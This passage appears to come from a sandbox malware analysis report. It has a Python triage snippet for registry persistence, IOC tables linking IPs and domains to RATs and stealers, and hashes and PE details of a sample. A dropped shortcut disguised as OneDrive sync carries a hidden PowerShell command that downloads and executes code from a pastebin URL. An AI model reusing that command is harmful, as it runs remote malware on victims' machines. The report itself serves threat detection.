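    parent=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    image=r"C:\Windows\system32\attrib.exe",
    cmdline=r'"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"')]
# Made-up control: what a genuine per-user OneDrive autostart looks like.
BENIGN_RUN_VALUE = RegistryEvent(
    key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
    data=r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background')

if __name__ == "__main__":
    for reg in (SAMPLE_RUN_VALUE, BENIGN_RUN_VALUE):
        f = triage_run_value(reg, SAMPLE_PROCESSES)
        print(reg.key, "|", severity(f), "|", f)
```

When hunting on a live host, the same checks apply to both Run views the report records (HKCU and HKCU64 are the 32-bit and 64-bit views of the same user hive); the .lnk target itself still needs to be parsed, since the shortcut, not the Run value, names the real payload.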
IP context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.20.3.235 | Lm9IJ4r9oO.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
104.20.3.235 | SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser | pastebin.com/raw/V9y5Q5vv
104.20.3.235 | sostener.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
104.20.3.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | Invoice-883973938.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | 2024 12_59_31 a.m..js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
162.159.137.232 | BeginSync lnk.lnk | malicious | Unknown |
162.159.137.232 | gaber.ps1 | malicious | Unknown |
162.159.137.232 | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER |
162.159.137.232 | SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exe | malicious | Unknown |
162.159.137.232 | WCA-Cooperative-Agreement.docx.exe | malicious | Babadeda, Exela Stealer, Python Stealer, Waltuhium Grabber |
162.159.137.232 | main.bat.bin.bat | malicious | Discord Rat |
162.159.137.232 | Bootstrapper V1.19.exe | malicious | Python Stealer, Empyrean, Discord Token Stealer |
162.159.137.232 | https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH- | malicious | HTMLPhisher |
162.159.137.232 | http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/ | malicious | Unknown |
162.159.137.232 | SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe | malicious | Unknown |
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              discord.comxK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                              • 162.159.138.232
                                                              BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                              • 162.159.137.232
                                                              gaber.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.137.232
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| | cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232 |
| | steamcodegenerator.exe | malicious | Unknown | 162.159.138.232 |
| | cr_asm.ps1 | malicious | Unknown | 162.159.138.232 |
| pastebin.com | HQsitBLlOv.dll | malicious | Unknown | 104.20.4.235 |
| | xK44OOt7vD.exe | malicious | Unknown | 172.67.19.24 |
| | steamcodegenerator.exe | malicious | Unknown | 172.67.19.24 |
| | Lm9IJ4r9oO.exe | malicious | Unknown | 104.20.3.235 |
| | gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24 |
| | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24 |
| | BeginSync lnk.lnk | malicious | Unknown | 104.20.3.235 |
| | gaber.ps1 | malicious | Unknown | 104.20.4.235 |
| | cr_asm_crypter.ps1 | malicious | Unknown | 104.20.4.235 |
| raw.githubusercontent.com | xK44OOt7vD.exe | malicious | Unknown | 185.199.110.133 |
| | steamcodegenerator.exe | malicious | Unknown | 185.199.109.133 |
| | Lm9IJ4r9oO.exe | malicious | Unknown | 185.199.111.133 |
| | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 185.199.111.133 |
| | BeginSync lnk.lnk | malicious | Unknown | 185.199.111.133 |
| | gaber.ps1 | malicious | Unknown | 185.199.108.133 |
| | cr_asm_crypter.ps1 | malicious | Unknown | 185.199.110.133 |
| | steamcodegenerator.exe | malicious | Unknown | 185.199.109.133 |
| | cr_asm.ps1 | malicious | Unknown | 185.199.108.133 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| CLOUDFLARENETUS | 5UIy3bo46y.dll | malicious | Unknown | 162.159.128.233 |
| | HQsitBLlOv.dll | malicious | Unknown | 104.17.112.233 |
| | xK44OOt7vD.exe | malicious | Unknown | 172.67.19.24 |
| | steamcodegenerator.exe | malicious | Unknown | 162.159.138.232 |
| | Lm9IJ4r9oO.exe | malicious | Unknown | 162.159.138.232 |
| | gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24 |
| | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.138.232 |
| | BeginSync lnk.lnk | malicious | Unknown | 104.18.111.161 |
| | gaber.ps1 | malicious | Unknown | 162.159.137.232 |
| FASTLYUS | 5UIy3bo46y.dll | malicious | Unknown | 185.199.109.133 |
| | HQsitBLlOv.dll | malicious | Unknown | 185.199.109.133 |
| | xK44OOt7vD.exe | malicious | Unknown | 185.199.110.133 |
| | steamcodegenerator.exe | malicious | Unknown | 185.199.109.133 |
| | Lm9IJ4r9oO.exe | malicious | Unknown | 185.199.111.133 |
| | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 185.199.111.133 |
| | BeginSync lnk.lnk | malicious | Unknown | 185.199.111.133 |
| | gaber.ps1 | malicious | Unknown | 185.199.108.133 |
| | cr_asm_crypter.ps1 | malicious | Unknown | 185.199.110.133 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 3b5074b1b5d032e5620f69f9f700ff0e | 5UIy3bo46y.dll | malicious | Unknown | 104.20.3.235, 185.199.108.133, 162.159.137.232 |
| | HQsitBLlOv.dll | malicious | Unknown | 104.20.3.235, 185.199.108.133, 162.159.137.232 |
| | xK44OOt7vD.exe | malicious | Unknown | 104.20.3.235, 185.199.108.133, 162.159.137.232 |
| | steamcodegenerator.exe | malicious | Unknown | 104.20.3.235, 185.199.108.133, 162.159.137.232 |
| | Lm9IJ4r9oO.exe | malicious | Unknown | 104.20.3.235, 185.199.108.133, 162.159.137.232 |
| | gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 104.20.3.235, 185.199.108.133, 162.159.137.232 |
| | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 104.20.3.235, 185.199.108.133, 162.159.137.232 |
| | BeginSync lnk.lnk | malicious | Unknown | 104.20.3.235, 185.199.108.133, 162.159.137.232 |
| | gaber.ps1 | malicious | Unknown | 104.20.3.235, 185.199.108.133, 162.159.137.232 |
No context
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                              Category:dropped
                                                              Size (bytes):1728
                                                              Entropy (8bit):4.527272298423835
                                                              Encrypted:false
                                                              SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                              MD5:724AA21828AD912CB466E3B0A79F478B
                                                              SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                              SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                              SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                              Malicious:true
                                                              Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):11608
                                                              Entropy (8bit):4.890472898059848
                                                              Encrypted:false
                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                              Malicious:false
                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1600
                                                              Entropy (8bit):5.685427275916648
                                                              Encrypted:false
                                                              SSDEEP:48:zSU4YymI4RIoUeCa+m9qr9tK8NfxBUICmL6o882:2HYvIIfLz9qr2KfnUjmLe
                                                              MD5:AF834D62657936BD004DFACF2B4B0E33
                                                              SHA1:EBCDAC08F40E6C3284CF852F4EB161AA02DF4C4A
                                                              SHA-256:012B750782ECD04C36E925F14B3C461E752078763062E00828C7ED1F295FCBF8
                                                              SHA-512:5413D3996ADC421B62AD54613092D87F440C27A2596E815BC14C7AAFF92B27F6A392393442154494BCF23B7597E8E552F5F16553039AB21736A9A7D67EAB3B2C
                                                              Malicious:false
                                                              Preview:@...e...........Q...................R.X.`............@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Users\user\Desktop\OSLdZanXNc.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):72
                                                              Entropy (8bit):4.644610558622846
                                                              Encrypted:false
                                                              SSDEEP:3:5FqvS0qfFXVbARV6oa:B0sVbz
                                                              MD5:FDF2E994BEA34B6B6F4B94DE701994AB
                                                              SHA1:B6F158090800D5706252CB4010AE55C77EA9CB27
                                                              SHA-256:7D681BAF6C76989E40D7669842EAC13A5A2115FED59D7DE645AEDA202206B5BD
                                                              SHA-512:788A36DCC54BB9AD0D6EE9501EFAC0A7FB65BCDE9060484E454BB98D334FAA5DFB3272FD38E39DC1F43E412FCB1274331CD6219B82214553E384A1BAA7280DE5
                                                              Malicious:false
                                                              Preview:[#] Usage : OSLdZanXNc.exe <Input x64 exe> <*Output*>..[#] Output : ....
                                                              File type:PE32+ executable (console) x86-64, for MS Windows
                                                              Entropy (8bit):6.115613434611554
                                                              TrID:
                                                              • Win64 Executable Console (202006/5) 92.65%
                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                              • DOS Executable Generic (2002/1) 0.92%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:OSLdZanXNc.exe
                                                              File size:45'568 bytes
                                                              MD5:98ff253f6f854df7b7f6794a2761dbd1
                                                              SHA1:246ae6060c76a6751b6ba2d9ca0de18e298b5e26
                                                              SHA256:a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203
                                                              SHA512:4e8a028a5f8a49e734cdf58f2337a486c7268997296f1048d5481896452524873345b74cb31c9ffd47db1721c6b5c927542e2f979341459f7da6d70ac287972d
                                                              SSDEEP:768:DvoFKVVoTnsXSkAut5oIZ3tHgBqT35QMt4135P:DvoFKYg7TBZBSW5Q04j
                                                              TLSH:1F236BA5BA5100D8C47B4078C92BD2FDB2B2FC95074096EF4301866D3FB37E8A9B6715
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........J..g...g...g.......g..}f...g.K.c...g..}d...g..}c...g..}b...g...f...g...f...g..zo...g..z....g..ze...g.Rich..g................
                                                              Icon Hash:00928e8e8686b000
                                                              Entrypoint:0x140001e80
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x140000000
                                                              Subsystem:windows cui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x66FF04D1 [Thu Oct 3 20:55:45 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:6
                                                              OS Version Minor:0
                                                              File Version Major:6
                                                              File Version Minor:0
                                                              Subsystem Version Major:6
                                                              Subsystem Version Minor:0
                                                              Import Hash:a43d15331c9ee28121574258bd659d78
Instruction (entry point 0x140001e80; the listing below is decoded as 32-bit code, so each "dec eax" is the 0x48 REX.W prefix of the following 64-bit instruction: "dec eax / sub esp, 28h" is "sub rsp, 28h". The "mov ecx, 17h / call IsProcessorFeaturePresent / int 29h" path with "mov edx, C0000409h" (STATUS_STACK_BUFFER_OVERRUN) is the compiler-generated MSVC __report_gsfailure stack-cookie handler, not sample logic.)
                                                              dec eax
                                                              sub esp, 28h
                                                              call 00007F7900C03BACh
                                                              dec eax
                                                              add esp, 28h
                                                              jmp 00007F7900C03657h
                                                              int3
                                                              int3
                                                              inc eax
                                                              push ebx
                                                              dec eax
                                                              sub esp, 20h
                                                              dec eax
                                                              mov ebx, ecx
                                                              xor ecx, ecx
                                                              call dword ptr [000081F3h]
                                                              dec eax
                                                              mov ecx, ebx
                                                              call dword ptr [000081F2h]
                                                              call dword ptr [000081DCh]
                                                              dec eax
                                                              mov ecx, eax
                                                              mov edx, C0000409h
                                                              dec eax
                                                              add esp, 20h
                                                              pop ebx
                                                              dec eax
                                                              jmp dword ptr [000081C0h]
                                                              dec eax
                                                              mov dword ptr [esp+08h], ecx
                                                              dec eax
                                                              sub esp, 38h
                                                              mov ecx, 00000017h
                                                              call dword ptr [000081A4h]
                                                              test eax, eax
                                                              je 00007F7900C037E9h
                                                              mov ecx, 00000002h
                                                              int 29h
                                                              dec eax
                                                              lea ecx, dword ptr [0000A232h]
                                                              call 00007F7900C0388Eh
                                                              dec eax
                                                              mov eax, dword ptr [esp+38h]
                                                              dec eax
                                                              mov dword ptr [0000A319h], eax
                                                              dec eax
                                                              lea eax, dword ptr [esp+38h]
                                                              dec eax
                                                              add eax, 08h
                                                              dec eax
                                                              mov dword ptr [0000A2A9h], eax
                                                              dec eax
                                                              mov eax, dword ptr [0000A302h]
                                                              dec eax
                                                              mov dword ptr [0000A173h], eax
                                                              dec eax
                                                              mov eax, dword ptr [esp+40h]
                                                              dec eax
                                                              mov dword ptr [0000A277h], eax
                                                              mov dword ptr [0000A14Dh], C0000409h
                                                              mov dword ptr [0000A147h], 00000001h
                                                              mov dword ptr [0000A151h], 00000001h
                                                              Programming Language:
                                                              • [IMP] VS2008 SP1 build 30729
Name                                   Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0xb3fc           0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE         0xe000           0x1e0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0xd000           0x588         .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0xf000           0x30          .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0xa9e0           0x70          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0xa8a0           0x140         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT              0xa000           0x230         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type             Entropy             Characteristics
.text   0x1000           0x83cc        0x8400    3f035b9a475e7b0bee14924a2ad04868  False     0.5557824337121212  zlib compressed data  6.326232743020032   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0xa000           0x1c4a        0x1e00    c7352e598965211983a506bc2a8aa61b  False     0.42109375          data                  4.731554548739669   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xc000           0xaa8         0x200     85c2aebd011c5c1b37c1009def59c2b6  False     0.09375             data                  0.5324895658143383  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata  0xd000           0x588         0x600     a25f8001a8d46e8c51bd3ab1ecc507ae  False     0.4876302083333333  data                  4.11853894347752    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0xe000           0x1e0         0x200     ae95088ed848b39aad014fdd45607faf  False     0.529296875         data                  4.701503258251789   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
